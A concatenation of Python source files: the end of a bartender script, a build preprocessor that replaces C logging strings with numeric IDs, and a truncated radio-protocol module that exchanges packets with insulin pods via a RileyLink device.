GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
traceback.print_exc()
bartender = Bartender()
bartender.buildMenu(drink_list, drink_options)
bartender.run()
|
Pre_Build.py
|
"""
@file Pre_Build.py
@author IR
@brief This script preprocesses source files for use with Log_t
@version 0.1
@date 2020-11-11
@copyright Copyright (c) 2020
This script works by first duplicating source files to the build folder. \n
Then it scans each file for calls to a Log function and modifies them as follows. \n
If the call has a string for `LOG_TAG` parameter, give that string a unique integer ID and replace it with that integer. \n
If the ID is not a string, leave the variable alone. \n
Replace the call's `LOG_MSG` string with a unique ID as well. \n
NOTE: The `LOG_MSG` parameter must always be an inline string. \n
`LOG_TAG`s and `LOG_MSG`s do not share IDs. \n
Eg.
```
Log(ID, "My Message"); -> Log(ID, 1);
Log("My Str ID", "My Message"); -> Log(1, 1);
```
Calls to Log functions also have the option to send a number with a third parameter. \n
Eg.
```
Log("My Str ID", "My Message", 56); -> Log(1, 1, 56);
Log(ID, "My Message", A_Num_Var); -> Log(ID, 1, A_Num_Var);
```
Declarations of `LOG_TAG` also have their strings replaced with a unique ID. \n
NOTE: Definition of `LOG_TAG`s must always be an inline string. \n
Eg.
```
LOG_TAG TAG = "Logging Tag"; -> LOG_TAG TAG = 2;
```
A special case has been made to also allocate and replace strings that are passed to the following macro
```
_LogPrebuildString(x)
```
Where x is the string; it is given a unique ID and replaced with that ID, just as if it were passed to a Log function.
This is useful where one wishes to generate log functions using the C preprocessor.
Note, however, that if this script is not run, the macro still allows everything to compile normally, leaving the string untouched.
"""
# @cond
import shutil
import hashlib
import os
import asyncio
import threading
import time
import errno
import re
import sys
import json
import pickle
from pathlib import Path
import io
from typing import Optional, IO
import subprocess
SOURCE_NAME = "src"
LIBRARIES_NAME = "libraries"
LIB_PATH = "libraries\\Log" # Path to the implementation of Log
LIB_FILE = "LogConfig.def"
LIB_DEFINE = ("#define CONF_LOGGING_MAPPED_MODE 0", "#define CONF_LOGGING_MAPPED_MODE 1")
WORKING_DIRECTORY_OFFSET = "build\\Pre_Build\\"
# FILE_OUTPUT_PATH = "build\\bin"
FILE_OUTPUT_PATH = ""
BYPASS_SCRIPT = os.path.exists("script.disable") # bypass script if this file is found
LIMIT_TAG = 254
LIMIT_ID = 65535
BLACKLIST_ADDRESSES = (0, 5, 9)
SOURCE_DEST_NAME = "{}{}".format(WORKING_DIRECTORY_OFFSET, SOURCE_NAME)
LIBRARIES_DEST_NAME = "{}{}".format(WORKING_DIRECTORY_OFFSET, LIBRARIES_NAME)
DATA_FILE = "{}.LogInfo".format(WORKING_DIRECTORY_OFFSET)
LOW_RAM = 4
BUF_SIZE = 65536
# PLACEHOLDER_TAG = "__PYTHON__TAG__PLACEHOLDER__{}__"
# PLACEHOLDER_ID = "__PYTHON__ID__PLACEHOLDER__{}__"
RamMemo = False
def AvailableRam():
global RamMemo
if not RamMemo:
out = subprocess.check_output("wmic OS get FreePhysicalMemory /Value", stderr=subprocess.STDOUT, shell=True)
RamMemo = round(
int(str(out).strip("b").strip("'").replace("\\r", "").replace("\\n", "").replace("FreePhysicalMemory=", "")) / 1048576, 2
)
return RamMemo
def hashFile(filePath):
if os.path.exists(filePath):
if AvailableRam() <= LOW_RAM:
sha256 = hashlib.sha256()
with open(filePath, "rb") as f:
while True:
data = f.read(BUF_SIZE)
if not data:
break
sha256.update(data)
return sha256.hexdigest()
else:
with open(filePath, "rb") as f:
return hashlib.sha256(f.read()).hexdigest()
return ""
class Text:
@staticmethod
def error(text):
return "\033[91m\033[1m\033[4m" + text + "\033[0m"
@staticmethod
def underline(text):
return "\033[4m" + text + "\033[0m"
@staticmethod
def header(text):
return "\033[1m\033[4m" + text + "\033[0m"
@staticmethod
def warning(text):
return "\033[93m\033[1m" + text + "\033[0m"
@staticmethod
def important(text):
return "\033[94m\033[1m" + text + "\033[0m"
@staticmethod
def reallyImportant(text):
return "\033[94m\033[1m\033[4m" + text + "\033[0m"
@staticmethod
def green(text):
return "\033[92m" + text + "\033[0m"
@staticmethod
def red(text):
return "\033[91m" + text + "\033[0m"
def save_data(Object):
with open(DATA_FILE, "wb") as f:
pickle.dump(Object, f)
def load_data():
# if os.path.exists(DATA_FILE):
# with open(DATA_FILE, "rb") as f:
# return pickle.load(f)
# print("No {} found".format(DATA_FILE))
return ({}, {}, {})
def touch(rawpath):
try:
Path(rawpath).mkdir(parents=True, exist_ok=True)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
class ScriptException(Exception):
pass
class OutOfIDsException(ScriptException):
def __init__(self, message):
super().__init__(message.strip(), "Script has ran out of allocatable IDs")
class OutOfTAGsException(ScriptException):
def __init__(self, message):
super().__init__(message.strip(), "Script has ran out of allocatable TAG IDs")
class MalformedTAGDefinitionException(ScriptException):
def __init__(self, message):
super().__init__(message.strip(), "Implicit, single char or number definition of a LOG_TAG type")
class MalformedLogCallException(ScriptException):
def __init__(self, message):
super().__init__(message.strip(), "Implicit string or number inside a call to Log")
def splitErrorString(error):
if issubclass(type(error), ScriptException):
return error.args[1] + "\n\t" + error.args[0]
else:
return error
OLD_DATA = load_data() # TBI
O_TAGs = OLD_DATA[0]
O_IDs = OLD_DATA[1]
O_Files = OLD_DATA[2]
TAGs = {}
IDs = {}
Files = {}
TAG_SEM = threading.BoundedSemaphore(1)
ID_SEM = threading.BoundedSemaphore(1)
FILE_SEM = threading.BoundedSemaphore(1)
# IMPROVE: Find a better way to get unique numbers
async def getUniqueID(findDuplicate=None):
if IDs.get(findDuplicate):
return IDs[findDuplicate]
ID_SEM.acquire()
old_vals = set(O_IDs.values())
vals = set(IDs.values())
for i in range(1, LIMIT_ID):
if i not in old_vals and i not in vals:
IDs[""] = i # Claim before returning
ID_SEM.release()
return i
# Attempt to clear up some IDs
ID_SEM.release()
raise OutOfIDsException("")
async def getUniqueTAG(findDuplicate=None):
if TAGs.get(findDuplicate):
return TAGs[findDuplicate]
TAG_SEM.acquire()
old_vals = set(O_TAGs.values())
vals = set(TAGs.values())
for i in range(1, LIMIT_TAG):
if i not in BLACKLIST_ADDRESSES and i not in old_vals and i not in vals:
TAGs[""] = i # Claim before returning
TAG_SEM.release()
return i
# Attempt to clear up some TAG IDs
TAG_SEM.release()
raise OutOfTAGsException("")
FIND_SPECIAL_REGEX = (
r"_LogPrebuildString\s*\(\s*(\".*?\")\s*\)" # -> _LogPrebuildString("Str") # Special case where we can indirectly allocate a string
)
FIND_CALL_REGEX_SS = r"Log(\.[diwef])?\s*\(\s*(\".*?\")\s*,\s*(\".*?\")\s*\)\s*;" # -> Log("Str", "Str");
FIND_CALL_REGEX_VS = r"Log(\.[diwef])?\s*\(\s*([^\"]+?)\s*,\s*(\".*?\")\s*\)\s*;" # -> Log(Var, "Str");
FIND_CALL_REGEX_SSV = r"Log(\.[diwef])?\s*\(\s*(\".*?\")\s*,\s*(\".*?\")\s*,\s*([^\"]+?)\s*\)\s*;" # -> Log("Str", "Str", Var); # FIXME: SSV does not seem to be working
FIND_CALL_REGEX_VSV = r"Log(\.[diwef])?\s*\(\s*([^\"]+?)\s*,\s*(\".*?\")\s*,\s*([^\"]+?)\s*\)\s*;" # -> Log(Var, "Str", Var);
FIND_CALL_REGEX_BAD = r"(Log(?:\.[diwef])?\s*\(\s*(?:[^\"]+?|\"(?:[^\"]|\\\")*?\")\s*,\s*)([^\";]+?)(\s*(?:,\s*(?:[^\"]+?))?\s*\)\s*;)" # Implicit string or number where it should not be | IDE will warn about numbers but will still compile
FIND_TAG_DEF_REGEX_BAD = r"(LOG_TAG(?= )\s*[^\"=]+?=\s*)([^\"=]+?)(\s*;)" # Implicit or single char definition of a tag type
FIND_TAG_DEF_REGEX_GOOD = r"LOG_TAG(?= )\s*[^\"=]+?=\s*(\".*?\")\s*;"
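# For example, re.findall(FIND_CALL_REGEX_SS, 'Log.d("Tag", "Msg");') yields
# [('.d', '"Tag"', '"Msg"')]; the two captured strings are what the script swaps for numeric IDs.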
Log_Levels = {
"": "[ LOG ] ",
".d": "[DEBUG] ",
".i": "[INFO] ",
".w": "[WARN] ",
".e": "[ERROR] ",
".f": "[FATAL] ",
}
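# The level prefix is prepended to the message text before an ID is allocated (see
# FileEntry.addNewID), so the same message logged at two different levels gets two distinct IDs.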
class FileEntry: # IMPROVE: Make IDs persistent
name = ""
path = ""
rawpath = ""
workingPath = ""
offset = ""
modified = False
error = ""
def __init__(self, RawPath, FilePath, FileName, Offset):
if not os.path.exists(FilePath):
raise FileNotFoundError(FilePath)
self.name = FileName
self.path = FilePath
self.rawpath = RawPath
self.workingPath = "{}{}".format(Offset, FilePath)
self.offset = Offset
# if O_Files.get(self.workingPath):
# print("Records show {} exists".format(FileName))
touch("{}{}".format(Offset, RawPath))
async def addNewTag(self, raw_str):
string = "[{}]".format(raw_str.strip('"'))
numberID = await getUniqueTAG(string)
TAG_SEM.acquire()
TAGs[string] = numberID
TAG_SEM.release()
return numberID
async def addNewID(self, raw_log_level, raw_str):
string = Log_Levels[raw_log_level] + raw_str.strip('"')
numberID = await getUniqueID(string)
ID_SEM.acquire()
IDs[string] = numberID
ID_SEM.release()
return numberID
async def SPECIAL_STR(self, line, reMatch):
ID = await self.addNewID("", reMatch) # Special strings are always LOG for simplicity
return line.replace(reMatch, str(ID))
async def VSX(self, line, reMatch):
ID = await self.addNewID(reMatch[0], reMatch[2])
return line.replace(reMatch[2], str(ID))
async def SSX(self, line, reMatch):
TAG = await self.addNewTag(reMatch[1])
ID = await self.addNewID(reMatch[0], reMatch[2])
return line.replace(reMatch[1], str(TAG)).replace(reMatch[2], str(ID))
async def NEW_TAG(self, line, reMatch):
TAG = await self.addNewTag(reMatch)
return line.replace(reMatch, str(TAG))
async def walkLines(self, function):
tempPath = self.workingPath + ".__Lock"
lineNo = 1
newline = ""
with open(self.path, "r", encoding="utf-8") as f1, open(tempPath, "w", encoding="utf-8") as f2:
for line in f1:
try:
newline = await function(line)
f2.buffer.write(newline.encode("utf-8"))
except Exception as e: # If prev exception was about IO then oh well
self.error = "{}{}{}\n".format(
self.error,
Text.warning(" {}:{}\n".format(self.path, lineNo)),
" {}\n > {}".format(Text.red(type(e).__name__), splitErrorString(e)),
)
f2.buffer.write(line.encode("utf-8"))
finally:
lineNo += 1
self.modified = not syncFile(tempPath, "", self.rawpath, self.workingPath)
os.remove(tempPath)
async def findLogMatch(self, line):
newline = line
SPECIAL = re.findall(FIND_SPECIAL_REGEX, line)
if SPECIAL:
newline = await self.SPECIAL_STR(line, SPECIAL[0])
else:
VS = re.findall(FIND_CALL_REGEX_VS, line)
if len(VS) != 0: # ¯\_(ツ)_/¯
newline = await self.VSX(line, VS[0])
else:
TAG_GOOD = re.findall(FIND_TAG_DEF_REGEX_GOOD, line)
if TAG_GOOD:
newline = await self.NEW_TAG(line, TAG_GOOD[0])
else:
VSV = re.findall(FIND_CALL_REGEX_VSV, line)
if len(VSV) != 0:
newline = await self.VSX(line, VSV[0])
else:
TAG_BAD = re.findall(FIND_TAG_DEF_REGEX_BAD, line)
if TAG_BAD:
TAG_BAD = TAG_BAD[0]
raise MalformedTAGDefinitionException(TAG_BAD[0] + Text.error(TAG_BAD[1]) + TAG_BAD[2])
else:
BAD = re.findall(FIND_CALL_REGEX_BAD, line)
if BAD:
BAD = BAD[0]
raise MalformedLogCallException(BAD[0] + Text.error(BAD[1]) + BAD[2])
else:
SS = re.findall(FIND_CALL_REGEX_SS, line)
if len(SS) != 0:
newline = await self.SSX(line, SS[0])
else:
SSV = re.findall(FIND_CALL_REGEX_SSV, line)
if len(SSV) != 0:
newline = await self.SSX(line, SSV[0])
return newline
async def scan(self):
await self.walkLines(self.findLogMatch)
async def ingest_files(finishFunc, FilesEntries):
for File in FilesEntries[0]:
finishFunc()
await File.scan()
def run_ingest_files(finishFunc, *FilesEntries):
asyncio.run(ingest_files(finishFunc, FilesEntries))
Files = set()
FileRefs = set()
Threads = set()
FILE_CHANGE = False
def syncFile(filePath, offset, rawpath, workingFilePath=None, suppress=False):
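# Copies filePath into the working tree whenever its hash differs from the existing copy;
# returns True if the working copy was already up to date (callers use `not syncFile(...)` as "modified").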
workingFilePath = workingFilePath or "{}{}".format(offset, filePath)
global FILE_CHANGE
new = hashFile(filePath)
old = hashFile(workingFilePath)
if old == "":
old = 0
FILE_CHANGE = FILE_CHANGE or (new != old)
if not os.path.exists(workingFilePath) or new != old:
touch("{}{}".format(offset, rawpath))
shutil.copyfile(filePath, workingFilePath)
if not suppress:
print("Sync File: {} -> {}".format(filePath, offset))
return False
return True
def allocate_files(Path, Offset):
async def lib_flag(line):
return line.replace(LIB_DEFINE[0], LIB_DEFINE[1])
for subdir, _, files in os.walk(Path):
for filename in files:
filepath = subdir + os.sep + filename
rawpath = subdir + os.sep
if BYPASS_SCRIPT:
syncFile(filepath, Offset, rawpath, suppress=True)
continue
if rawpath.startswith(LIB_PATH):
libFile = FileEntry(rawpath, filepath, filename, Offset)
if libFile.name == LIB_FILE:
asyncio.run(libFile.walkLines(lib_flag))
continue
File_Ent = FileEntry(rawpath, filepath, filename, Offset)
Files.add(File_Ent)
FileRefs.add(File_Ent)
def dole_files(count, finishFunc):
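# Hands the global Files set out to worker threads in batches of `count` files each.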
while True:
file_set = set()
i = 0
while len(Files) != 0 and i != count:
file_set.add(Files.pop())
i += 1
if len(file_set) != 0: # IMPROVE: Use actual multithreading
# Threads.add(multiprocessing.Process(target=function, args=(file_set)))
Threads.add(threading.Thread(target=run_ingest_files, args=(finishFunc, file_set)))
if len(Files) == 0:
break
class ThreadedProgressBar:
bar_len = 10
maxcount = 0
counter = 0
Lines = set()
run = True
prefix = ""
formatStr = "{} │{}│ {}{}\r"
class TextIO(io.TextIOWrapper):
def __init__(
self,
func,
buffer: IO[bytes],
encoding: str = ...,
errors: Optional[str] = ...,
newline: Optional[str] = ...,
line_buffering: bool = ...,
write_through: bool = ...,
):
super(ThreadedProgressBar.TextIO, self).__init__(buffer, encoding, errors, newline, line_buffering, write_through)
self.func = func
def write(self, s):
self.func(s.strip("\n "))
def getOriginal(self):
return super()
def __init__(self, maxcount, prefix):
self.maxcount = maxcount
self.stdout = sys.stdout
self.wrapper = ThreadedProgressBar.TextIO(
self._newLine,
sys.stdout.buffer,
sys.stdout.encoding,
sys.stdout.errors,
sys.stdout.newlines,
sys.stdout.line_buffering,
sys.stdout.write_through,
)
sys.stdout = self.wrapper
self.rename(prefix)
def rename(self, prefix):
mx_sz = len(self.formatStr.format(prefix, " " * self.bar_len, 100.0, "%"))
self.bar_len = min(int(os.get_terminal_size().columns - 1 - (mx_sz / 1.25)), mx_sz)
self.bar_len = self.bar_len if self.bar_len > 0 else 0
self.prefix = prefix
def reset(self, maxcount, prefix):
self.maxcount = maxcount
self.rename(prefix)
self.counter = 0
def _newLine(self, String):
self.Lines.add(String)
def _progress(self, count, total, prefix="", printString=""):
if total > 0:
filled_len = int(round(self.bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = "█" * filled_len + "░" * (self.bar_len - filled_len)
proStr = self.formatStr.format(prefix, bar, percents, "%")
if len(printString) > 0:
self.stdout.write(" " * (os.get_terminal_size().columns - 1))
self.stdout.write("\r")
self.stdout.write(printString)
self.stdout.write("\n")
self.stdout.write(proStr)
self.stdout.flush()
def _printThread(self):
while self.run or len(self.Lines) > 0:
if len(self.Lines) > 0:
self._progress(self.counter, self.maxcount, self.prefix, self.Lines.pop())
else:
self._progress(self.counter, self.maxcount, self.prefix)
def start(self):
self.printer = threading.Thread(target=self._printThread)
self.printer.start()
def progress(self):
self.counter += 1
def finish(self):
print("\0") # Eh
self.run = False
self.printer.join()
self._progress(self.counter, self.maxcount, self.prefix)
self.wrapper.flush()
sys.stdout = self.wrapper.getOriginal()
print()
def begin_scan():
for t in Threads:
t.start()
for t in Threads:
t.join()
try:
del IDs[""]
except KeyError:
pass
try:
del TAGs[""]
except KeyError:
pass
def printResults():
maxPrinted = 8
print(Text.header("\nModified Files:"))
c = 0
m = 0
for f in FileRefs:
if f.modified:
if c < maxPrinted:
print(" {}".format(Text.green(f.name)))
c += 1
else:
m += 1
if f.error != "":
Files.add(f)
if m > 1:
print(" {}".format(Text.underline(Text.green("{} more file{}".format(m, "s" if m > 1 else "")))))
sys.stdout.flush()
c = 0
m = 0
print(Text.header("\nFile Errors:"))
for f in Files:
if c < maxPrinted:
print(f.error.strip("\n"))
c += 1
else:
m += 1
if m > 1:
print(" {}".format(Text.underline(Text.red("{} more error{}".format(m, "s" if m > 1 else "")))))
def getOutputFile(path):
output_name = "log_lookup.json"
savePath = "{}\\{}".format(path, output_name)
if savePath.startswith("\\"):
savePath = output_name
return savePath
def save_lookup(path):
toSave = (TAGs, IDs)
touch(path)
with open(getOutputFile(path), "w") as f:
json.dump(toSave, f, indent=4, separators=(",", ": "))
# Start Script
def main():
touch(SOURCE_DEST_NAME)
touch(LIBRARIES_DEST_NAME)
allocate_files(SOURCE_NAME, WORKING_DIRECTORY_OFFSET)
allocate_files(LIBRARIES_NAME, WORKING_DIRECTORY_OFFSET)
if not BYPASS_SCRIPT:
print()
time.sleep(0.5) # Let terminal settle
print(Text.warning("Available Ram: {} GBs\n".format(AvailableRam())))
prehash = hashFile(getOutputFile(FILE_OUTPUT_PATH))
print("Files to search: {}".format(len(FileRefs)))
tb = ThreadedProgressBar(len(Files), Text.important("Completed Files:"))
dole_files(8, tb.progress)
print("Threads to run: {}\n".format(len(Threads)))
tb.start()
begin_scan()
tb.finish()
printResults()
save_lookup(FILE_OUTPUT_PATH)
newhash = hashFile(getOutputFile(FILE_OUTPUT_PATH))
if FILE_CHANGE:
print(Text.important("\nNote: Files have changed, rebuild inbound"))
if newhash != prehash:
print(Text.reallyImportant("\nNote: Output file values have changed"))
# try:
# shutil.rmtree(SOURCE_DEST_NAME)
# shutil.rmtree(LIBRARIES_DEST_NAME)
# except FileNotFoundError:
# pass
if __name__ == "__main__":
main()
# @endcond
|
protocol_radio.py
|
from .exceptions import PacketRadioError, OmnipyTimeoutError, RecoverableProtocolError, StatusUpdateRequired
from podcomm.packet_radio import TxPower
from podcomm.protocol_common import *
from .pr_rileylink import RileyLink
from .definitions import *
from threading import Thread, Event, RLock
import binascii
import os
import struct
import time
import subprocess
def _ack_data(address1, address2, sequence):
return RadioPacket(address1, RadioPacketType.ACK, sequence,
struct.pack(">I", address2))
class MessageExchange:
def __init__(self):
self.unique_packets = 0
self.repeated_sends = 0
self.receive_timeouts = 0
self.repeated_receives = 0
self.protocol_errors = 0
self.bad_packets = 0
self.radio_errors = 0
self.successful = False
self.queued = 0
self.started = 0
self.ended = 0
class PdmRadio:
def __init__(self, radio_address, msg_sequence=0, pkt_sequence=0, packet_radio=None):
self.radio_address = radio_address
self.message_sequence = msg_sequence
self.packet_sequence = pkt_sequence
self.logger = getLogger()
self.packet_logger = get_packet_logger()
if packet_radio is None:
self.packet_radio = RileyLink()
else:
self.packet_radio = packet_radio
self.last_packet_received = None
self.last_packet_timestamp = None
self.request_arrived = Event()
self.response_received = Event()
self.request_shutdown = Event()
self.request_message = None
self.double_take = False
self.tx_power = None
self.expect_critical_follow_up = False
self.pod_message = None
self.response_exception = None
self.radio_thread = None
self.pdm_message = None
self.pdm_message_address = None
self.ack_address_override = None
self.debug_cut_last_ack = False
self.debug_cut_msg_after = None
self.debug_cut_message_seq = 0
self.debug_cut_packet_seq = 0
self.stats = []
self.current_exchange = MessageExchange()
self.radio_lock = RLock()
self.start()
def start(self):
with self.radio_lock:
self.radio_thread = Thread(target=self._radio_loop)
self.radio_thread.setDaemon(True)
self._radio_init()
self.radio_thread.start()
def stop(self):
with self.radio_lock:
self.request_shutdown.set()
self.request_arrived.set()
self.radio_thread.join()
self.radio_thread = None
self.request_shutdown.clear()
def send_message_get_message(self, message,
message_address = None,
ack_address_override=None,
tx_power=None, double_take=False,
expect_critical_follow_up=False):
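# Hands the request to the radio thread via request_arrived and blocks on response_received;
# the result (or exception) comes back through self.pod_message / self.response_exception.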
queued = time.time()
with self.radio_lock:
if self.radio_thread is None:
raise PacketRadioError("Radio is stopped")
self.pdm_message = message
if message_address is None:
self.pdm_message_address = self.radio_address
else:
self.pdm_message_address = message_address
self.ack_address_override = ack_address_override
self.pod_message = None
self.double_take = double_take
self.tx_power = tx_power
self.expect_critical_follow_up = expect_critical_follow_up
self.request_arrived.set()
self.response_received.wait()
self.response_received.clear()
self.current_exchange.queued = queued
if self.pod_message is None:
self.current_exchange.successful = False
self.stats.append(self.current_exchange)
raise self.response_exception
self.current_exchange.successful = True
self.stats.append(self.current_exchange)
return self.pod_message
def get_packet(self, timeout=30000):
with self.radio_lock:
received = self.packet_radio.get_packet(timeout=timeout)
p, rssi = self._get_packet(received)
return p
def disconnect(self):
with self.radio_lock:
self._disconnect()
def _disconnect(self):
try:
self.packet_radio.disconnect(ignore_errors=True)
except Exception:
self.logger.exception("Error while disconnecting")
def _radio_loop(self):
while True:
if not self.request_arrived.wait(timeout=5.0):
self._disconnect()
self.request_arrived.wait()
self.request_arrived.clear()
if self.request_shutdown.wait(0):
self._disconnect()
break
self.current_exchange = MessageExchange()
self.current_exchange.started = time.time()
try:
self.pod_message = self._send_and_get(self.pdm_message, self.pdm_message_address,
self.ack_address_override,
tx_power=self.tx_power, double_take=self.double_take,
expect_critical_follow_up=self.expect_critical_follow_up)
self.response_exception = None
except Exception as e:
self.pod_message = None
self.response_exception = e
if self.response_exception is None:
ack_packet = self._final_ack(self.ack_address_override, self.packet_sequence)
self.current_exchange.ended = time.time()
self.response_received.set()
if not self.debug_cut_last_ack:
try:
self._send_packet(ack_packet, allow_premature_exit_after=3.5)
except Exception:
self.logger.exception("Error during ending conversation, ignored.")
else:
self.message_sequence = (self.message_sequence - self.debug_cut_message_seq) % 16
self.packet_sequence = (self.packet_sequence - self.debug_cut_packet_seq) % 16
self.last_packet_received = None
self.last_packet_timestamp = None
else:
self.current_exchange.ended = time.time()
self.response_received.set()
def _interim_ack(self, ack_address_override, sequence):
if ack_address_override is None:
return _ack_data(self.radio_address, self.radio_address, sequence)
else:
return _ack_data(self.radio_address, ack_address_override, sequence)
def _final_ack(self, ack_address_override, sequence):
if ack_address_override is None:
return _ack_data(self.radio_address, 0, sequence)
else:
return _ack_data(self.radio_address, ack_address_override, sequence)
def _radio_init(self, retries=1):
retry = 0
while retry < retries:
try:
self.packet_radio.disconnect()
self.packet_radio.connect(force_initialize=True)
return True
except:
self.logger.exception("Error during radio initialization")
self._kill_btle_subprocess()
time.sleep(2)
retry += 1
return False
def _kill_btle_subprocess(self):
try:
p = subprocess.Popen(["ps", "-A"], stdout=subprocess.PIPE)
out, err = p.communicate()
for line in out.decode(errors="ignore").splitlines():
if "bluepy-helper" in line:
pid = int(line.split(None, 1)[0])
os.kill(pid, 9)
break
except:
self.logger.warning("Failed to kill bluepy-helper")
def _reset_sequences(self):
self.packet_sequence = 0
self.message_sequence = (self.message_sequence + 1) % 16
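# Sends all packets of a PDM message and collects the pod response. Each packet
# is retried with escalating recovery steps (longer timeouts, radio re-init,
# disconnect plus killing the bluepy helper), chosen by which part of the
# message failed and how many repeats were already attempted.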
def _send_and_get(self, pdm_message, pdm_message_address, ack_address_override=None,
tx_power=None, double_take=False, expect_critical_follow_up=False):
packets = pdm_message.get_radio_packets(message_address=pdm_message_address,
message_sequence=self.message_sequence,
packet_address=self.radio_address,
first_packet_sequence=self.packet_sequence,
double_take=double_take,
expect_critical_follow_up=expect_critical_follow_up)
try:
if tx_power is not None:
self.packet_radio.set_tx_power(tx_power)
except PacketRadioError:
if not self._radio_init(3):
raise
received = None
packet_count = len(packets)
self.current_exchange.unique_packets = packet_count * 2
for part in range(0, packet_count):
packet = packets[part]
repeat_count = -1
timeout = 10
while True:
repeat_count += 1
if repeat_count == 0:
self.logger.debug("Sending PDM message part %d/%d" % (part + 1, packet_count))
else:
self.logger.debug("Sending PDM message part %d/%d (Repeat: %d)" %
(part + 1, packet_count, repeat_count))
if part == packet_count - 1:
expected_type = RadioPacketType.POD
else:
expected_type = RadioPacketType.ACK
try:
if self.debug_cut_msg_after is None or self.debug_cut_msg_after != part:
received = self._exchange_packets(packet.with_sequence(self.packet_sequence),
expected_type=expected_type,
timeout=timeout)
break
else:
raise Exception("debug cut here")
except OmnipyTimeoutError:
self.logger.debug("Trying to recover from timeout error")
if part == 0:
if repeat_count == 0:
timeout = 15
continue
elif repeat_count == 1:
timeout = 10
time.sleep(2)
continue
elif repeat_count == 2:
self._radio_init()
timeout = 15
continue
else:
self.logger.debug("Failed recovery")
self._reset_sequences()
raise
elif part < packet_count - 1:
if repeat_count < 2:
timeout = 20
continue
else:
raise
else:
if repeat_count < 10:
timeout = 20
continue
else:
raise
except PacketRadioError:
self.logger.debug("Trying to recover from radio error")
self.current_exchange.radio_errors += 1
if part == 0:
if repeat_count < 2:
self._radio_init()
continue
elif repeat_count < 4:
self._disconnect()
self._kill_btle_subprocess()
timeout = 10
time.sleep(2)
continue
else:
self.logger.debug("Failed recovery")
raise
elif part < packet_count - 1:
if repeat_count < 6:
self._disconnect()
self._kill_btle_subprocess()
timeout = 10
time.sleep(2)
continue
else:
self.logger.debug("Failed recovery")
raise
else:
if repeat_count < 10:
self._disconnect()
self._kill_btle_subprocess()
timeout = 10
time.sleep(2)
continue
else:
self.logger.debug("Failed recovery")
raise
except RecoverableProtocolError as rpe:
self.logger.debug("Trying to recover from protocol error")
self.packet_sequence = (rpe.packet.sequence + 1) % 32
self.message_sequence = (self.message_sequence + 1) % 16
if expected_type == RadioPacketType.POD and rpe.packet.type == RadioPacketType.ACK:
raise StatusUpdateRequired()
continue
except ProtocolError:
self.logger.debug("Trying to recover from protocol error")
self.packet_sequence = (self.packet_sequence + 2) % 32
continue
part += 1
self.packet_sequence = (received.sequence + 1) % 32
self.packet_logger.info("SENT MSG %s" % pdm_message)
part_count = 0
if received.type == RadioPacketType.POD:
part_count = 1
self.logger.debug("Received POD message part %d." % part_count)
pod_response = PodMessage()
while not pod_response.add_radio_packet(received):
ack_packet = self._interim_ack(ack_address_override, (received.sequence + 1) % 32)
received = self._exchange_packets(ack_packet, RadioPacketType.CON)
part_count += 1
self.logger.debug("Received POD message part %d." % part_count)
self.packet_logger.info("RCVD MSG %s" % pod_response)
self.logger.debug("Send and receive completed.")
self.message_sequence = (pod_response.sequence + 1) % 16
self.packet_sequence = (received.sequence + 1) % 32
return pod_response
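# Sends a single packet and waits for a reply, discarding corrupted data,
# packets addressed elsewhere and repeats of the previously received packet.
# An unexpected packet type or sequence raises RecoverableProtocolError so that
# _send_and_get() can resynchronize the sequence counters and retry.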
def _exchange_packets(self, packet_to_send, expected_type, timeout=10):
start_time = None
first = True
while start_time is None or time.time() - start_time < timeout:
if first:
first = False
else:
self.current_exchange.repeated_sends += 1
if self.last_packet_timestamp is None or time.time() - self.last_packet_timestamp > 4:
received = self.packet_radio.send_and_receive_packet(packet_to_send.get_data(), 0, 0, 300, 1, 300)
else:
received = self.packet_radio.send_and_receive_packet(packet_to_send.get_data(), 0, 0, 120, 0, 40)
if start_time is None:
start_time = time.time()
self.packet_logger.info("SEND PKT %s" % packet_to_send)
if received is None:
self.current_exchange.receive_timeouts += 1
self.packet_logger.debug("RECV PKT None")
self.packet_radio.tx_up()
continue
p, rssi = self._get_packet(received)
if p is None:
self.current_exchange.bad_packets += 1
self.packet_logger.debug("RECV PKT BAD DATA: %s" % received.hex())
self.packet_radio.tx_down()
continue
self.packet_logger.info("RECV PKT %s" % p)
if p.address != self.radio_address:
self.current_exchange.bad_packets += 1
self.packet_logger.debug("RECV PKT ADDR MISMATCH")
self.packet_radio.tx_down()
continue
self.last_packet_timestamp = time.time()
if self.last_packet_received is not None and \
p.sequence == self.last_packet_received.sequence and \
p.type == self.last_packet_received.type:
self.current_exchange.repeated_receives += 1
self.packet_logger.debug("RECV PKT previous")
self.packet_radio.tx_up()
continue
self.last_packet_received = p
self.packet_sequence = (p.sequence + 1) % 32
if expected_type is not None and p.type != expected_type:
self.packet_logger.debug("RECV PKT unexpected type %s" % p)
self.current_exchange.protocol_errors += 1
raise RecoverableProtocolError("Unexpected packet type", p)
if p.sequence != (packet_to_send.sequence + 1) % 32:
self.packet_sequence = (p.sequence + 1) % 32
self.packet_logger.debug("RECV PKT unexpected sequence %s" % p)
self.last_packet_received = p
self.current_exchange.protocol_errors += 1
raise RecoverableProtocolError("Incorrect packet sequence", p)
return p
raise OmnipyTimeoutError("Exceeded timeout during send and receive")
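# Sends the final ack repeatedly until the pod falls silent (no reply within a
# short listen window). When allow_premature_exit_after is set, the loop may
# bail out early if a new request is already queued, keeping the radio responsive.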
def _send_packet(self, packet_to_send, timeout=25, allow_premature_exit_after=None):
start_time = None
self.current_exchange.unique_packets += 1
while start_time is None or time.time() - start_time < timeout:
try:
self.packet_logger.info("SEND PKT %s" % packet_to_send)
received = self.packet_radio.send_and_receive_packet(packet_to_send.get_data(), 0, 0, 300, 0, 40)
if start_time is None:
start_time = time.time()
if allow_premature_exit_after is not None and \
time.time() - start_time >= allow_premature_exit_after:
if self.request_arrived.wait(timeout=0):
self.logger.debug("Prematurely exiting final phase to process next request")
self.packet_sequence = (self.packet_sequence + 1) % 32
break
if received is None:
received = self.packet_radio.get_packet(0.6)
if received is None:
self.packet_logger.debug("Silence")
self.packet_sequence = (self.packet_sequence + 1) % 32
break
p, rssi = self._get_packet(received)
if p is None:
self.current_exchange.bad_packets += 1
self.packet_logger.debug("RECV PKT bad %s" % received.hex())
self.packet_radio.tx_down()
continue
if p.address != self.radio_address:
self.current_exchange.bad_packets += 1
self.packet_logger.debug("RECV PKT ADDR MISMATCH")
self.packet_radio.tx_down()
continue
self.last_packet_timestamp = time.time()
if self.last_packet_received is not None:
self.current_exchange.repeated_receives += 1
